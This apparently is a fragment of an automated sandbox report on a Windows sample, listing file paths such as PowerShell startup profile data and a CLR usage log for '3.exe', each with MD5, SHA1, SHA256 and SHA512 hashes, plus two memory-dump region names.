SHA1 696a9fed9578a4f0f73e598f9d71a0c1f9d04090
SHA256 f61c0e17ef24ce95d3d00170c5553c9b5b536d24c0d8e6e7480b3e2eb3855a02
SHA512 f61d859fc00bf1009e6d72a0536fcd3d95d7f06016ed44dcdc1d91a872dad8abda02c7f409dcb9d0e5ea8c8c75b0d8683a60ea57045639402c37eca9eab77940

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 276798eeb29a49dc6e199768bc9c2e71
SHA1 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256 cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA512 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 45d55cc71ae97d2e4037edb5737e5273
SHA1 b6f97bcab63117e2d6301212c0a4857942a2a1ee
SHA256 838018b5caf4eccbed97a4603cc02f0c48b0f379427b2f0ab6fe017e4c0f30ed
SHA512 95f3a9988236253d0c4cdc938d3e33e074c93faf2df592d44cf122c77ea60e9d4224185c91256b98152e663e165a541dc6f012253a5a6588abbf107c3618decb

memory/4308-171-0x000001EC1A380000-0x000001EC1A38A000-memory.dmp

memory/4308-172-0x000001EC1A3B0000-0x000001EC1A3C2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 04114c0529b116bf66d764ff6a5a8fe3
SHA1 0caeff17d1b2190f76c9bf539105f6c40c92bd14
SHA256 fd7092b4e273314186bad6ce71aa4cd69450736b6ec6cc746868997ff82a7532
SHA512 6a718c330824346606ef24f71cca6be0bfafc626b1d2b060b36e919ab07f3d6a345f56cace8a5a84ffbe2183976eb197842c9fd2f3e3b8c8dd307057d59d6f26

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 10890cda4b6eab618e926c4118ab0647
SHA1 1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d
SHA256 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
SHA512 a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\3.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1